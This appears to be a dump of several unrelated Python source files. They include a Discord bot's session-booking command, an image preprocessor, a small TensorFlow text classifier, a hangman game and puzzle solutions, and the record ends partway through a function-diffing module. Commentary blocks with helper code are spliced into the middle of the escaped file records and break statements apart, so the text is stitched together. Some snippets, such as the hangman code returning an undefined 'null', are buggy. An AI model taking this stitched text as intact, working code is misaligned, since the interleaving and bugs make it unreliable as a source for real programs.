round(diff / 3600)\n diffstr = \"`In {:>2} hour{}`\".format(hours, 's' if hours > 1 else ' ')\n\n return \"{} | - \".format(\n diffstr,\n time.timestamp(),\n time.timestamp() + 3600,\n )\n\n\nuser_locks = {} # Map userid -> 
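# Note on time_format above: its format string passes three arguments but
# shows only one placeholder. The missing pieces were almost certainly
# Discord timestamp markup whose angle brackets were stripped from this
# record (the same stripping is visible elsewhere in this file). Discord
# renders <t:UNIX:STYLE> client-side; a hedged reconstruction of the helper:
def discord_ts(unix_seconds, style="t"):
    # style "t" renders a short time in the viewer's own timezone.
    return "<t:{:.0f}:{}>".format(unix_seconds, style)

assert discord_ts(1609459200) == "<t:1609459200:t>"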
ctx\n\n\n@contextlib.contextmanager\ndef ensure_exclusive(ctx):\n \"\"\"\n Cancel any existing exclusive contexts for the author.\n \"\"\"\n old_ctx = user_locks.pop(ctx.author.id, None)\n if old_ctx:\n [task.cancel() for task in old_ctx.tasks]\n\n user_locks[ctx.author.id] = ctx\n try:\n yield\n finally:\n new_ctx = user_locks.get(ctx.author.id, None)\n if new_ctx and new_ctx.msg.id == ctx.msg.id:\n user_locks.pop(ctx.author.id)\n\n\n@module.cmd(\n name=\"schedule\",\n desc=\"View your schedule, and get rewarded for attending scheduled sessions!\",\n group=\"Productivity\",\n aliases=('rooms', 'sessions')\n)\n@in_guild()\nasync def cmd_rooms(ctx):\n \"\"\"\n Usage``:\n {prefix}schedule\n {prefix}schedule book\n {prefix}schedule cancel\n Description:\n View your schedule with `{prefix}schedule`.\n Use `{prefix}schedule book` to schedule a session at a selected time..\n Use `{prefix}schedule cancel` to cancel a scheduled session.\n \"\"\"\n lower = ctx.args.lower()\n splits = lower.split()\n command = splits[0] if splits else None\n\n if not ctx.guild_settings.accountability_category.value:\n return await ctx.error_reply(\"The scheduled session system isn't set up!\")\n\n # First grab the sessions the member is booked in\n joined_rows = accountability_member_info.select_where(\n userid=ctx.author.id,\n start_at=GEQ(utc_now()),\n _extra=\"ORDER BY start_at ASC\"\n )\n\n if command == 'cancel':\n if not joined_rows:\n return await ctx.error_reply(\"You have no scheduled sessions to cancel!\")\n\n # Show unbooking menu\n lines = [\n \"`[{:>2}]` | {}\".format(i, time_format(row['start_at']))\n for i, row in enumerate(joined_rows)\n ]\n out_msg = await ctx.reply(\n content=\"Please reply with the number(s) of the sessions you want to cancel. E.g. `1, 3, 5` or `1-3, 7-8`.\",\n embed=discord.Embed(\n title=\"Please choose the sessions you want to cancel.\",\n description='\\n'.join(lines),\n colour=discord.Colour.orange()\n ).set_footer(\n text=(\n \"All times are in your own timezone! 
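# ensure_exclusive above is a "last caller wins" guard: entering cancels the
# previous context registered for the same user, and cleanup removes the
# registry entry only if it is still ours. A stripped-down, dependency-free
# version of the same shape:
import contextlib

_active = {}

@contextlib.contextmanager
def exclusive(key, token):
    _active[key] = token
    try:
        yield
    finally:
        if _active.get(key) is token:  # only clean up our own registration
            _active.pop(key)

with exclusive("user-1", object()):
    assert "user-1" in _active
assert "user-1" not in _active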
Hover over a time to see the date.\"\n )\n )\n )\n\n await ctx.cancellable(\n out_msg,\n cancel_message=\"Cancel menu closed, no scheduled sessions were cancelled.\",\n timeout=70\n )\n\n def check(msg):\n valid = msg.channel == ctx.ch and msg.author == ctx.author\n valid = valid and (re.search(multiselect_regex, msg.content) or msg.content.lower() == 'c')\n return valid\n\n with ensure_exclusive(ctx):\n try:\n message = await ctx.client.wait_for('message', check=check, timeout=60)\n except asyncio.TimeoutError:\n try:\n await out_msg.edit(\n content=None,\n embed=discord.Embed(\n description=\"Cancel menu timed out, no scheduled sessions were cancelled.\",\n colour=discord.Colour.red()\n )\n )\n await out_msg.clear_reactions()\n except discord.HTTPException:\n pass\n return\n\n try:\n await out_msg.delete()\n await message.delete()\n except discord.HTTPException:\n pass\n\n if message.content.lower() == 'c':\n return\n\n to_cancel = [\n joined_rows[index]\n for index in parse_ranges(message.content) if index < len(joined_rows)\n ]\n if not to_cancel:\n return await ctx.error_reply(\"No valid sessions selected for cancellation.\")\n elif any(row['start_at'] < utc_now() for row in to_cancel):\n return await ctx.error_reply(\"You can't cancel a running session!\")\n\n slotids = [row['slotid'] for row in to_cancel]\n async with room_lock:\n deleted = accountability_members.delete_where(\n userid=ctx.author.id,\n slotid=slotids\n )\n\n # Handle case where the slot has already opened\n # TODO: Possible race condition if they open over the hour border? Might never cancel\n for row in to_cancel:\n aguild = AGuild.cache.get(row['guildid'], None)\n if aguild and aguild.upcoming_slot and aguild.upcoming_slot.data:\n if aguild.upcoming_slot.data.slotid in slotids:\n aguild.upcoming_slot.members.pop(ctx.author.id, None)\n if aguild.upcoming_slot.channel:\n try:\n await aguild.upcoming_slot.channel.set_permissions(\n ctx.author,\n overwrite=None\n )\n except discord.HTTPException:\n pass\n await aguild.upcoming_slot.update_status()\n break\n\n ctx.alion.addCoins(sum(row[2] for row in deleted))\n\n remaining = [row for row in joined_rows if row['slotid'] not in slotids]\n if not remaining:\n await ctx.embed_reply(\"Cancelled all your upcoming scheduled sessions!\")\n else:\n next_booked_time = min(row['start_at'] for row in remaining)\n if len(to_cancel) > 1:\n await ctx.embed_reply(\n \"Cancelled `{}` upcoming sessions!\\nYour next session is at .\".format(\n len(to_cancel),\n next_booked_time.timestamp()\n )\n )\n else:\n await ctx.embed_reply(\n \"Cancelled your session at !\\n\"\n \"Your next session is at .\".format(\n to_cancel[0]['start_at'].timestamp(),\n next_booked_time.timestamp()\n )\n )\n elif command == 'book':\n # Show booking menu\n # Get attendee count\n rows = accountability_member_info.select_where(\n guildid=ctx.guild.id,\n userid=NOTNULL,\n select_columns=(\n 'slotid',\n 'start_at',\n 'COUNT(*) as num'\n ),\n _extra=\"GROUP BY start_at, slotid\"\n )\n attendees = {row['start_at']: row['num'] for row in rows}\n attendee_pad = max((len(str(num)) for num in attendees.values()), default=1)\n\n # Build lines\n already_joined_times = set(row['start_at'] for row in joined_rows)\n start_time = utc_now().replace(minute=0, second=0, microsecond=0)\n times = (\n start_time + datetime.timedelta(hours=n)\n for n in range(1, 25)\n )\n times = [\n time for time in times\n if time not in already_joined_times and (time - utc_now()).total_seconds() > 660\n ]\n lines = [\n \"`[{num:>2}]` | 
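# The menus above accept replies like "1, 3, 5" or "1-3, 7-8" and feed them
# to utils.lib.parse_ranges, which is not included in this record. One
# plausible shape for such a parser, purely for illustration:
def parse_multiselect(text):
    picked = set()
    for part in text.replace(" ", "").split(","):
        if not part:
            continue
        if "-" in part:
            lo, hi = part.split("-", 1)
            picked.update(range(int(lo), int(hi) + 1))
        else:
            picked.add(int(part))
    return sorted(picked)

assert parse_multiselect("1, 3, 5") == [1, 3, 5]
assert parse_multiselect("1-3, 7-8") == [1, 2, 3, 7, 8]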
`{count:>{count_pad}}` attending | {time}\".format(\n num=i,\n count=attendees.get(time, 0), count_pad=attendee_pad,\n time=time_format(time),\n )\n for i, time in enumerate(times)\n ]\n # TODO: Nicer embed\n # TODO: Don't allow multi bookings if the member has a bad attendance rate\n out_msg = await ctx.reply(\n content=(\n \"Please reply with the number(s) of the sessions you want to book. E.g. `1, 3, 5` or `1-3, 7-8`.\"\n ),\n embed=discord.Embed(\n title=\"Please choose the sessions you want to schedule.\",\n description='\\n'.join(lines),\n colour=discord.Colour.orange()\n ).set_footer(\n text=(\n \"All times are in your own timezone! Hover over a time to see the date.\"\n )\n )\n )\n await ctx.cancellable(\n out_msg,\n cancel_message=\"Booking menu cancelled, no sessions were booked.\",\n timeout=60\n )\n\n def check(msg):\n valid = msg.channel == ctx.ch and msg.author == ctx.author\n valid = valid and (re.search(multiselect_regex, msg.content) or msg.content.lower() == 'c')\n return valid\n\n with ensure_exclusive(ctx):\n try:\n message = await ctx.client.wait_for('message', check=check, timeout=30)\n except asyncio.TimeoutError:\n try:\n await out_msg.edit(\n content=None,\n embed=discord.Embed(\n description=\"Booking menu timed out, no sessions were booked.\",\n colour=discord.Colour.red()\n )\n )\n await out_msg.clear_reactions()\n except discord.HTTPException:\n pass\n return\n\n try:\n await out_msg.delete()\n await message.delete()\n except discord.HTTPException:\n pass\n\n if message.content.lower() == 'c':\n return\n\n to_book = [\n times[index]\n for index in parse_ranges(message.content) if index < len(times)\n ]\n if not to_book:\n return await ctx.error_reply(\"No valid sessions selected.\")\n elif any(time < utc_now() for time in to_book):\n return await ctx.error_reply(\"You can't book a running session!\")\n cost = len(to_book) * ctx.guild_settings.accountability_price.value\n if cost > ctx.alion.coins:\n return await ctx.error_reply(\n \"Sorry, booking `{}` sessions costs `{}` coins, and you only have `{}`!\".format(\n len(to_book),\n cost,\n ctx.alion.coins\n )\n )\n\n # Add the member to data, creating the row if required\n slot_rows = accountability_rooms.fetch_rows_where(\n guildid=ctx.guild.id,\n start_at=to_book\n )\n slotids = [row.slotid for row in slot_rows]\n to_add = set(to_book).difference((row.start_at for row in slot_rows))\n if to_add:\n slotids.extend(row['slotid'] for row in accountability_rooms.insert_many(\n *((ctx.guild.id, start_at) for start_at in to_add),\n insert_keys=('guildid', 'start_at'),\n ))\n accountability_members.insert_many(\n *((slotid, ctx.author.id, ctx.guild_settings.accountability_price.value) for slotid in slotids),\n insert_keys=('slotid', 'userid', 'paid')\n )\n\n # Handle case where the slot has already opened\n # TODO: Fix this, doesn't always work\n aguild = AGuild.cache.get(ctx.guild.id, None)\n if aguild:\n if aguild.upcoming_slot and aguild.upcoming_slot.start_time in to_book:\n slot = aguild.upcoming_slot\n if not slot.data:\n # Handle slot activation\n slot._refresh()\n channelid, messageid = await slot.open()\n accountability_rooms.update_where(\n {'channelid': channelid, 'messageid': messageid},\n slotid=slot.data.slotid\n )\n else:\n slot.members[ctx.author.id] = SlotMember(slot.data.slotid, ctx.author.id, ctx.guild)\n # Also update the channel permissions\n try:\n await slot.channel.set_permissions(ctx.author, view_channel=True, connect=True)\n except discord.HTTPException:\n pass\n await slot.update_status()\n 
ctx.alion.addCoins(-cost)\n\n # Ack purchase\n embed = discord.Embed(\n title=\"You have scheduled the following session{}!\".format('s' if len(to_book) > 1 else ''),\n description=(\n \"*Please attend all your scheduled sessions!*\\n\"\n \"*If you can't attend, cancel with* `{}schedule cancel`\\n\\n{}\"\n ).format(\n ctx.best_prefix,\n '\\n'.join(time_format(time) for time in to_book),\n ),\n colour=discord.Colour.orange()\n ).set_footer(\n text=(\n \"Use {prefix}schedule to see your current schedule.\\n\"\n ).format(prefix=ctx.best_prefix)\n )\n try:\n await ctx.reply(\n embed=embed,\n reference=ctx.msg\n )\n except discord.NotFound:\n await ctx.reply(embed=embed)\n else:\n # Show accountability room information for this user\n # Accountability profile\n # Author\n # Special case for no past bookings, emphasis hint\n # Hint on Bookings section for booking/cancelling as applicable\n # Description has stats\n # Footer says that all times are in their timezone\n # TODO: attendance requirement shouldn't be retroactive! Add attended data column\n # Attended `{}` out of `{}` booked (`{}%` attendance rate!)\n # Attendance streak: `{}` days attended with no missed sessions!\n # Add explanation for first time users\n\n # Get all slots the member has ever booked\n history = accountability_member_info.select_where(\n userid=ctx.author.id,\n # start_at=LEQ(utc_now() - datetime.timedelta(hours=1)),\n start_at=LEQ(utc_now()),\n select_columns=(\"*\", \"(duration > 0 OR last_joined_at IS NOT NULL) AS attended\"),\n _extra=\"ORDER BY start_at DESC\"\n )\n\n if not (history or joined_rows):\n # First-timer information\n about = (\n \"You haven't scheduled any study sessions yet!\\n\"\n \"Schedule a session by typing **`{}schedule book`** and selecting \"\n \"the hours you intend to study, \"\n \"then attend by joining the session voice channel when it starts!\\n\"\n \"Only if everyone attends will they get the bonus of `{}` LionCoins!\\n\"\n \"Let's all do our best and keep each other accountable 🔥\"\n ).format(\n ctx.best_prefix,\n ctx.guild_settings.accountability_bonus.value\n )\n embed = discord.Embed(\n description=about,\n colour=discord.Colour.orange()\n )\n embed.set_footer(\n text=\"Please keep your DMs open so I can notify you when the session starts!\\n\",\n icon_url=hint_icon\n )\n await ctx.reply(embed=embed)\n else:\n # Build description with stats\n if history:\n # First get the counts\n attended_count = sum(row['attended'] for row in history)\n total_count = len(history)\n total_duration = sum(row['duration'] for row in history)\n\n # Add current session to duration if it exists\n if history[0]['last_joined_at'] and (utc_now() - history[0]['start_at']).total_seconds() < 3600:\n total_duration += int((utc_now() - history[0]['last_joined_at']).total_seconds())\n\n # Calculate the streak\n timezone = ctx.alion.settings.timezone.value\n\n streak = 0\n current_streak = None\n max_streak = 0\n day_attended = None\n date = utc_now().astimezone(timezone).replace(hour=0, minute=0, second=0, microsecond=0)\n daydiff = datetime.timedelta(days=1)\n\n i = 0\n while i < len(history):\n row = history[i]\n i += 1\n if not row['attended']:\n # Not attended, streak broken\n pass\n elif row['start_at'] > date:\n # They attended this day\n day_attended = True\n continue\n elif day_attended is None:\n # Didn't attend today, but don't break streak\n day_attended = False\n date -= daydiff\n i -= 1\n continue\n elif not day_attended:\n # Didn't attend the day, streak broken\n date -= daydiff\n i -= 1\n pass\n 
else:\n # Attended the day\n streak += 1\n\n # Move window to the previous day and try the row again\n date -= daydiff\n day_attended = False\n i -= 1\n continue\n\n max_streak = max(max_streak, streak)\n if current_streak is None:\n current_streak = streak\n streak = 0\n\n # Handle loop exit state, i.e. the last streak\n if day_attended:\n streak += 1\n max_streak = max(max_streak, streak)\n if current_streak is None:\n current_streak = streak\n\n # Build the stats\n table = {\n \"Sessions\": \"**{}** attended out of **{}**, `{:.0f}%` attendance rate.\".format(\n attended_count,\n total_count,\n (attended_count * 100) / total_count,\n ),\n \"Time\": \"**{:02}:{:02}** in scheduled sessions.\".format(\n total_duration // 3600,\n (total_duration % 3600) // 60\n ),\n \"Streak\": \"**{}** day{} with no missed sessions! (Longest: **{}** day{}.)\".format(\n current_streak,\n 's' if current_streak != 1 else '',\n max_streak,\n 's' if max_streak != 1 else '',\n ),\n }\n desc = prop_tabulate(*zip(*table.items()))\n else:\n desc = (\n \"Good luck with your next session!\\n\"\n )\n\n # Build currently booked list\n\n if joined_rows:\n # TODO: (Future) calendar link\n # Get attendee counts for currently booked sessions\n rows = accountability_member_info.select_where(\n slotid=[row[\"slotid\"] for row in joined_rows],\n userid=NOTNULL,\n select_columns=(\n 'slotid',\n 'guildid',\n 'start_at',\n 'COUNT(*) as num'\n ),\n _extra=\"GROUP BY start_at, slotid, guildid ORDER BY start_at ASC\"\n )\n attendees = {\n row['start_at']: (row['num'], row['guildid']) for row in rows\n }\n attendee_pad = max((len(str(num)) for num, _ in attendees.values()), default=1)\n\n # TODO: Allow cancel to accept multiselect keys as args\n show_guild = any(guildid != ctx.guild.id for _, guildid in attendees.values())\n guild_map = {}\n if show_guild:\n for _, guildid in attendees.values():\n if guildid not in guild_map:\n guild = ctx.client.get_guild(guildid)\n if not guild:\n try:\n guild = await ctx.client.fetch_guild(guildid)\n except discord.HTTPException:\n guild = None\n guild_map[guildid] = guild\n\n booked_list = '\\n'.join(\n \"`{:>{}}` attendees | {} {}\".format(\n num,\n attendee_pad,\n time_format(start),\n \"\" if not show_guild else (\n \"on this server\" if guildid == ctx.guild.id else \"in **{}**\".format(\n guild_map[guildid] or \"Unknown\"\n )\n )\n ) for start, (num, guildid) in attendees.items()\n )\n booked_field = (\n \"{}\\n\\n\"\n \"*If you can't make your session, please cancel using `{}schedule cancel`!*\"\n ).format(booked_list, ctx.best_prefix)\n\n # Temporary footer for acclimatisation\n # footer = \"All times are displayed in your own timezone!\"\n footer = \"Book another session using {}schedule book\".format(ctx.best_prefix)\n else:\n booked_field = (\n \"Your schedule is empty!\\n\"\n \"Book another session using `{}schedule book`.\"\n ).format(ctx.best_prefix)\n footer = \"Please keep your DMs open for notifications!\"\n\n # Finally, build embed\n embed = discord.Embed(\n colour=discord.Colour.orange(),\n description=desc,\n ).set_author(\n name=\"Schedule statistics for {}\".format(ctx.author.name),\n icon_url=ctx.author.avatar_url\n ).set_footer(\n text=footer,\n icon_url=hint_icon\n ).add_field(\n name=\"Upcoming sessions\",\n value=booked_field\n )\n\n # And send it!\n await ctx.reply(embed=embed)\n\n\n# TODO: 
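# The streak walk above is subtle because it mixes per-session rows with
# per-day windows in the user's timezone. Its core idea reduces to counting
# consecutive attended days backwards from today; a simplified day-level
# sketch (it ignores the record's "today not attended yet" grace case):
import datetime

def day_streak(attended_days, today):
    streak, day = 0, today
    while day in attended_days:
        streak += 1
        day -= datetime.timedelta(days=1)
    return streak

today = datetime.date(2021, 6, 10)
assert day_streak({today, today - datetime.timedelta(days=1)}, today) == 2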
roomadmin\n","repo_name":"justw0rk/StudyLion","sub_path":"bot/modules/accountability/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":23897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"11494869336","text":"import os, subprocess, argparse\n\nparser = argparse.ArgumentParser(description = \"A preprocessor that creates webp's from png's and svg's from tikz standalone LaTeX files.\")\nparser.add_argument('-f', '--forceRegenerateFiles', nargs='*',\n help=\"Force regenerate given files. No arguments will force regenerate all files.\",\n metavar=\"File names\")\nargs = parser.parse_args()\nrootdir = os.path.dirname(os.path.abspath(__file__)) + \"/images\"\n\ndef pngToWebp(pngPath, webpPath):\n subprocess.run(f\"cwebp -q 100 -lossless -mt '{pngPath}' -o '{webpPath}'\", shell=True)\n\ndef texToSvg(file, directory):\n dviName = file[:-3] + \"dvi\"\n subprocess.run(f\"latex {file}\", shell=True, cwd=directory)\n subprocess.run(f\"dvisvgm --exact --font-format=woff {dviName}\", shell=True, cwd=directory)\n\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n if args.forceRegenerateFiles is None:\n forceRegenerate = False\n else:\n if len(args.forceRegenerateFiles) != 0:\n forceRegenerate = file in args.forceRegenerateFiles\n else:\n forceRegenerate = True\n\n path = os.path.join(subdir, file)\n if file.endswith(\"png\"):\n webpPath = path[:-3] + \"webp\"\n if not os.path.exists(webpPath) or forceRegenerate:\n pngToWebp(path, webpPath)\n elif file.endswith(\"tex\"):\n svgPath = path[:-3] + \"svg\"\n if not os.path.exists(svgPath) or forceRegenerate:\n texToSvg(file, subdir)\n","repo_name":"OmarEmaraDev/squircle","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21478131828","text":"import tensorflow as tf\n\nfrom sklearn.utils import shuffle\n\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\n# config \nvocab_size = 1000\nembedding_dim = 16\nmax_length = 100\ntrunc_type='post'\npadding_type='post'\noov_tok = \"\"\ntraining_size = 150\n\n\n# read data\nsentences = []\nlabels = []\n\nf = open('politics', 'r') \nlines = f.readlines() \nfor line in lines:\n sentences.append(line)\n labels.append(1)\nf.close()\n\nf = open('sports', 'r') \nlines = f.readlines() \nfor line in lines:\n sentences.append(line)\n labels.append(0)\nf.close()\n\nprint(len(sentences))\n\n# shuffle\nsentences, labels = shuffle(sentences, labels, random_state=0)\n\n# configure training & testing data\ntraining_sentences = sentences[0:training_size]\ntesting_sentences = sentences[training_size:]\ntraining_labels = labels[0:training_size]\ntesting_labels = labels[training_size:]\n\n\n# tokenizer\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\ntokenizer.fit_on_texts(training_sentences)\n\nword_index = tokenizer.word_index\n\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\ntraining_padded = pad_sequences(training_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\ntesting_padded = pad_sequences(testing_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\n# work with tensorflow 2.x\nimport numpy as np\ntraining_padded = 
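# The preprocessor above shells out via subprocess.run(..., shell=True) with
# paths interpolated into the command string. Passing an argument list avoids
# quoting problems with spaces or shell metacharacters in file names; an
# equivalent call shape for the cwebp step (assumes cwebp is on PATH):
import subprocess

def png_to_webp(png_path, webp_path):
    # check=True raises CalledProcessError on a non-zero exit status.
    subprocess.run(
        ["cwebp", "-q", "100", "-lossless", "-mt", png_path, "-o", webp_path],
        check=True,
    )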
np.array(training_padded)\ntraining_labels = np.array(training_labels)\ntesting_padded = np.array(testing_padded)\ntesting_labels = np.array(testing_labels)\n\n# configure keras network\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, input_length=max_length),\n tf.keras.layers.GlobalAveragePooling1D(),\n tf.keras.layers.Dense(24, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])\n\nmodel.summary()\n\n# train\nnum_epochs = 30\nhistory = model.fit(training_padded, training_labels, epochs=num_epochs, validation_data=(testing_padded, testing_labels), verbose=2)\n\n\n# plot\nimport matplotlib.pyplot as plt\n\n\ndef plot_graphs(history, string):\n plt.plot(history.history[string])\n plt.plot(history.history['val_'+string])\n plt.xlabel(\"Epochs\")\n plt.ylabel(string)\n plt.legend([string, 'val_'+string])\n plt.show()\n \nplot_graphs(history, \"accuracy\")\nplot_graphs(history, \"loss\")\n\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n# wtf\ndef decode_sentence(text):\n return ' '.join([reverse_word_index.get(i, '?') for i in text])\n\nprint(decode_sentence(training_padded[0]))\nprint(training_sentences[2])\nprint(labels[2])\n\n# ?\ne = model.layers[0]\nweights = e.get_weights()[0]\nprint(weights.shape) # shape: (vocab_size, embedding_dim)\n\n# write files\nimport io\n\nout_v = io.open('vecs.tsv', 'w', encoding='utf-8')\nout_m = io.open('meta.tsv', 'w', encoding='utf-8')\nfor word_num in range(1, vocab_size):\n word = reverse_word_index[word_num]\n embeddings = weights[word_num]\n out_m.write(word + \"\\n\")\n out_v.write('\\t'.join([str(x) for x in embeddings]) + \"\\n\")\nout_v.close()\nout_m.close()\n\nsentence = [\"Landing in Wisconsin. Launching big new ship contract!\", \n \"LAW & ORDER!\",\n \"Told that @NYCMayor Bill de Blasio wants to paint the fabled & beautiful Fifth Avenue, right in front of Trump Tower/Tiffany, with a big yellow Black Lives Matter sign. \\“Pigs in a Blanket, Fry ‘Em Like Bacon\\”, referring to killing Police, is their chant. 
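# The record above sets oov_tok to an empty string — likely the conventional
# "<OOV>" with its angle brackets stripped by whatever sanitised this file.
# A tiny self-contained round trip of the fit / sequence / pad pipeline it
# relies on (assumes TensorFlow is installed):
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences

tok = Tokenizer(num_words=50, oov_token="<OOV>")
tok.fit_on_texts(["the match was great", "parliament passed the bill"])
seqs = tok.texts_to_sequences(["the bill was great again"])  # "again" -> OOV id 1
padded = pad_sequences(seqs, maxlen=6, padding="post", truncating="post")
assert padded.shape == (1, 6)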
NYC Police are furious!\"]\nsequences = tokenizer.texts_to_sequences(sentence)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\nprint(model.predict(padded))","repo_name":"Fmaj7-dev/paipai","sub_path":"src/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37578247270","text":"#hangman program\ndef error_Handle_Word():\n bool = True;\n while bool == True:\n userInput = str(input(\"Enter a word: \"))\n count = 0;\n special_count = 0;\n list(userInput)\n lenUserInput = len(userInput)\n #use of ascii to check if input contains only numbers\n for a in range(0, lenUserInput, 1):\n char=userInput[a];\n ascii=ord(char);\n if ascii <97 or ascii >122:\n count = count +1\n if ascii == 32:\n count = count -1\n special_count = special_count +1\n if count == 0 and special_count != lenUserInput:\n\n bool = False;\n return userInput\n\n else:\n print(\"Re-enter valid input\");\n\n\ndef stringPrompt(string):\n arrayString = list(string);\n length= len(arrayString);\n dashArray = []\n for x in range(length):\n dashArray.append(\"_\");\n return arrayString, dashArray\ndef charPrompt():\n bool = True;\n while bool == True:\n guess = str(input(\"enter a letter\"))\n arrayGuess = list(guess)\n length = len(arrayGuess)\n if length == 1:\n ascii=ord(guess);\n if ascii>96 and ascii <123:\n bool = False\n\n return guess\ndef comparison(guess, arrayString, dashArray):\n length = len(arrayString)\n count = 0\n for x in range(length):\n if arrayString[x]==guess:\n dashArray[x] = guess;\n count=count+1\n #False -> did not find char\n if count == 0:\n return False\n #True -> found char\n if count >0:\n return True;\n return null\ndef usedGuess(charGuess):\n return null\ndef main():\n strike_counter = 0\n\n strike_display = []\n usedGuess = []\n string = error_Handle_Word();\n arrayString, dashArray = stringPrompt(string)\n win_length = len(arrayString)\n print(dashArray)\n #add a not winner thing\n print(\"___\\n|\\n|\\n|\")\n while strike_counter < 6 and arrayString != dashArray:\n if strike_counter == 1:\n print(\"___\\n| O\\n|\\n|\");\n elif strike_counter == 2:\n print(\"___\\n| O\\n| |\\n|\")\n elif strike_counter == 3:\n print(\"___\\n| O\\n| \\|\\n|\")\n elif strike_counter == 4:\n print(\"___\\n| O\\n| \\|/\\n|\")\n elif strike_counter == 5:\n print(\"___\\n| O\\n| \\|/\\n| /\")\n\n guess = charPrompt()\n usedGuess.append(guess)\n strike = comparison(guess, arrayString, dashArray)\n if strike == False:\n strike_counter = strike_counter+1\n strike_display.append(\"X\")\n print(\"Used letters: \", usedGuess)\n print(\"Strikes: \", strike_display)\n print(dashArray)\n if strike_counter == 6:\n print(\"___\\n| O\\n| \\|/\\n| /\\\\\")\n print(\"You lose\")\n elif arrayString == dashArray:\n print(\"You win\")\n #if strike == 6 you lose else you are a winner\n\nmain();\n","repo_name":"mmamel/CS160H","sub_path":"assignment_5.py","file_name":"assignment_5.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33350072923","text":"import numpy as np \nimport random as r \nfrom scipy import misc\nimport matplotlib.pyplot as plt\nimport math\nimport os\n\ndef getColor(char):\n\tr = char\n\tg = char*char%256\n\tb = char*char*char%256\n\treturn [r,g,b]\n\nfilename = os.getcwd() + '/codeToImage.py'\nfilename = 
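# The hangman snippet above returns a bare `null` on some paths, which is
# undefined in Python (a NameError if ever reached), and its comparison()
# tallies matches with a manual counter. A corrected minimal core: reveal
# matched letters in place and report whether the guess hit anything.
def reveal(guess, answer, board):
    hit = False
    for i, ch in enumerate(answer):
        if ch == guess:
            board[i] = guess
            hit = True
    return hit

board = ["_"] * 5
assert reveal("l", list("hello"), board) is True
assert board == ["_", "_", "l", "l", "_"]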
'/media/dodo/M3NT0R/Privat/Projekte/ticTacToe/tic5.py'\nf1 = open(filename,'r')\ncontent = f1.read()\nf1.close()\n\ncontent = content.replace('\\t',' ')\ncontent = content.split('\\n')\nmaximum = []\nimage = []\nfor element in content:\n\tmaximum.append(len(element))\n\timage.append([])\nmaximum = max(maximum)\n\nfor i in range(len(content)):\n\tcontent[i] = content[i] + (maximum - len(content[i]))*' '\n\nfor i in range(len(content)):\n\ttmp = []\n\tfor char in content[i]:\n\t\ttmp.append(getColor(ord(char)))\n\timage[i] = tmp\n\nimage = misc.toimage(image)\nmisc.imsave('test.png',image)\n","repo_name":"dodonator/metaCode","sub_path":"codeToImage.py","file_name":"codeToImage.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35965081100","text":"import sys\n\ninput = sys.stdin.readline\n\ns = list(input().rstrip())\nlst = [0]*26\nfor c in s:\n if c.isupper():\n lst[ord(c)-65] +=1\n else:\n lst[ord(c)-97] +=1\n\nmax_ = 0\nans = 0\nfor i in range(len(lst)):\n if lst[i]>max_:\n ans = i\n max_ = lst[i]\n elif lst[i]==max_:\n ans = -2\nprint(chr(ans+65))","repo_name":"hyunkyungju/problem-solving","sub_path":"백준/Bronze/1157. 단어 공부/단어 공부.py","file_name":"단�� 공부.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36779857891","text":"#plan\n#need to go through the frequencise and pass through the filters which is a list in a list\n#need to figure out way to check with each fiter range and return a count\n\nfrom collections import Counter\n\n\ndef countSignals(frequencies, filterRanges):\n # Write your code here\n store_nums = []\n for ranges in filterRanges:\n for number in frequencies:\n if number in range(ranges[0], ranges[1]):\n \n store_nums.append(number)\n\n \n \n counted_dict= dict(Counter(store_nums))\n \n amount = 0\n \n counted_dict = dict((k, v) for k, v in counted_dict.items() if v == len(filterRanges))\n return (len(counted_dict))\n # if len(filterRanges) in counted_dict.values():\n # print(\"\")\n\n # for freq in counted_dict:\n # print(freq, \"test\")\n # if freq.get() == len(filterRanges):\n \n # amount += 1\n \n # print(amount)","repo_name":"ddelfaus/Practice-Problems","sub_path":"HackerRank/thing2/filteringsingals.py","file_name":"filteringsingals.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69962019732","text":"import compare.compare\nimport core.score\nimport features.feature\nimport features.function_features.naming_parsing\nimport features.groupby\nfrom features.function_features import naming_parsing\n\n\nimport collections\nimport compare.compare_function\nimport features.function_features.overview_functions\nfrom features.function_features.build_cfg.utils import cfg_info_to_score\nimport features.function_features.changed_constants\nimport core.utils\n\n\ndef score_xref_function_name(feature_type, compare_object, scores, reduce_function, type_of_change=compare.compare.TypesOfChanges.CHANGED, **kwargs):\n for xref_to_look_type_of_change, base_score, pe_index in scores:\n xref_changes = compare_object.get_changed_called_functions(xref_to_look_type_of_change)\n pe_obj = compare_object.objects_to_compare[pe_index].get_pe_obj()\n for added_func in xref_changes:\n function_name 